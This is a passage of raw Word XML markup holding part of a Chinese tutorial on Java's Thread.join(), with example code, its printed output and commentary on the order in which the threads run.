                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (Exception e) {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13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="485" name="图片 73"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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System.out.println("Exception from main");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14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="486" name="图片 74" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="487" name="图片 75"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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System.out.println(threadName + " end!");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16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="488" name="图片 76" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="489" name="图片 77" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138"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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="00FE3CD0" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240" w:line="212" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pP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打印结果：</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 </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main start. // main</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法所在的线程起动，但没有马上结束，这里并不是因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法，而是因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Thread.sleep(2000);</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[CustomThread1] Thread start. //</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>起动</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[CustomThread1] Thread loop at 0//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>执行</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[CustomThread1] Thread loop at 1//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>执行</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lastRenderedPageBreak/>
        <w:t>main end!// Thread.sleep(2000);</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>结束，虽然在线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>执行了</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>t1.join();</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，但这并不会影响到其他线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>这里</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法所在的线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。</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[CustomThread] Thread start. //</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>起动，但没有马上结束，因为调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>t1.join();</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，所以要等到</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>t1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>结束了，此线程才能向下执行。</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[CustomThread1] Thread loop at 2//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>继续执行</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[CustomThread1] Thread loop at 3//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>继续执行</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[CustomThread1] Thread loop at 4//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>继续执行</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[CustomThread1] Thread end. //</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>结束了</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 xml:space="preserve">[CustomThread] Thread end. // </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>t1.join();</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>阻塞处起动，向下继续执行的结果</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 </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 </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五、从源码看</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>join()</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法</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 </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在</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法里，执行了</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>t1.join();</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，进入看一下它的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>源码：</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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="00FE3CD0" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="212" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="490" name="Codehighlighter1_53_70_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/Expanded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highlighter1_53_70_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId136"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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
